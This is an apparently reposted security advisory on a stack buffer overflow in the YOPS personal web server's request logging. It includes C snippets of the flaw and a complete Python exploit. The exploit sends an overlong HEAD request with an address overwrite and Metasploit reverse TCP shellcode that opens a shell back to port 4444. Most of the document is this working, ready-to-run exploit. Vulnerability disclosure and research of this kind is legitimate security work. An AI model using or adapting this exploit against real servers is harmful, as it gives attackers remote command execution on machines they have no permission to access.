扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 |
[DCA-00015] [Software] - YOPS (Your Open Personal [WEB] Server) [Vendor Product Description] - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. There are 7 stages (accept, parse, launch, fetch, error, send and log), and pipes are used as interstage channels. [Bug Description] - In function http_parse_request_header the application fails to do a boundary check for a malformed buffer received as a HTTP command (HEAD/GET/POST), prior to use it as input for logger variable at swebs_record_log function. --- http.c snippet --- int http_parse_request_header(char *data, struct http_request_header *h) { int r; int ver, rev; char *s, *tok, *l, *prm; [...] r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev); if (r != 2) return -400; [...] } --- END snippet --- --- swebs.c snippet --- int swebs_record_log(int log, JOB *job) { int err; time_t now; char timestr[32]; char logrec[MAX_REQUEST_LINE_LEN + 1]; [...] sprintf ( logrec, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d", job->client, timestr, job->hdr.request_line, job->response_hlen, job->response_blen_sent, job->response_blen, job->status ); [...] } --- END snippet --- [History] - Advisory sent to vendor on 08/26/2010 [Impact] - High (Remote Command Execution) [Affected Version] - YOPS 2009-11-30 - Prior versions may also be vulnerable [Code] #!/usr/bin/python # Software: # YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. # URL: http://sourceforge.net/projects/yops2009/ # # Vulnerability: Rodrigo Escobar aka ipax @ DcLabs # Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs # Contact: waKKu <AT> dclabs <DOT> com <DOT> br HOST = "localhost" PORT = 8888 import socket import sys import time try: BUFF_LEN = int(sys.argv[1]) except: BUFF_LEN = 802 FIXUP_ADDR = "\x47\xce\x04\x08" shellcode = ( # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444 "\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4" "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0" "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a" "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3" "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d" "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0" "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43" ) buffer = "HEAD " buffer += "A"*BUFF_LEN buffer += FIXUP_ADDR*4 buffer += " HTTP/1.1" stackadjust = ( "\xcb" # instruction alignment "\xbc\x69\x69\x96\xb0" # Stack Adjustment ) payload = buffer + stackadjust + shellcode + "\r\n\r\n" print """ ###################################### ### DcLabs Security Research Group ### ### +Exploit+ ### ###################################### Software: YOPS 2009 - Web Server --- Vulnerability by: ipax Exploit by: waKKu Greetings to: All DcLabs members """ print " [+] Using BUFF_LEN -> ", str(BUFF_LEN) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print " [+] Trying to establish connection..." s.connect((HOST, PORT)) print " [+] Sending a dummy request to initialize data..." s.send("HEAD DcLabs HTTP/1.1\r\n\r\n") try: s.recv(1024) except: pass s.close() time.sleep(3) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) print " [+] Sending our malicious payload..." s.send(payload) print " [+] Payload sent, good luck!" s.close() -- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br |
体验盒子
